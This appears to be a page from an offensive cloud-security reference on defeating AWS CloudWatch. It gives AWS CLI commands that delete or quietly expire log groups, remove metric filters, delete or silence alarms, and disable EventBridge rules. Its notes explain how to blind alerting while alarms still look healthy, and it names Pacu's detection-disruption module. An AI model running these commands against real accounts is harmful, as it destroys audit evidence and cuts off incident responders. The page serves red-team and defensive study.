CloudWatch

CloudWatch holds application and service logs, the metric filters that turn log patterns into metrics, and the alarms that page a responder. It is both evidence and the alerting path, so deleting log groups removes the record while deleting or disabling alarms removes the notification.

Delete or expire the logs#

bash
aws logs describe-log-groups
aws logs delete-log-group --log-group-name <lg>
# or silently age everything out to the minimum
aws logs put-retention-policy --log-group-name <lg> --retention-in-days 1

Break the alerting path#

bash
# remove the metric filter that feeds an alarm
aws logs delete-metric-filter --log-group-name <lg> --filter-name <f>
# delete or neuter the alarm itself
aws cloudwatch delete-alarms --alarm-names <a>
aws cloudwatch disable-alarm-actions --alarm-names <a>
# disable the EventBridge rule that routes an event to a responder
aws events disable-rule --name <rule>

Exploitation notes#

  • disable-alarm-actions leaves the alarm present and green while silencing its SNS or Lambda action, which is quieter than deleting it.
  • Log groups delivered to a central account (a logging account in an organization) keep the evidence even after the local group is deleted.
  • Metric filters are the usual bridge from a log pattern (for example root login) to an alarm; removing the filter blinds the alarm without touching the alarm.

Tools#

  • AWS CLI (logs, cloudwatch, events): log group, filter, alarm, and rule control.
  • Pacu (detection__disruption): disrupts CloudWatch alongside the other detection services.

References#

Cookie Consent

We use cookies to enhance your experience. Learn more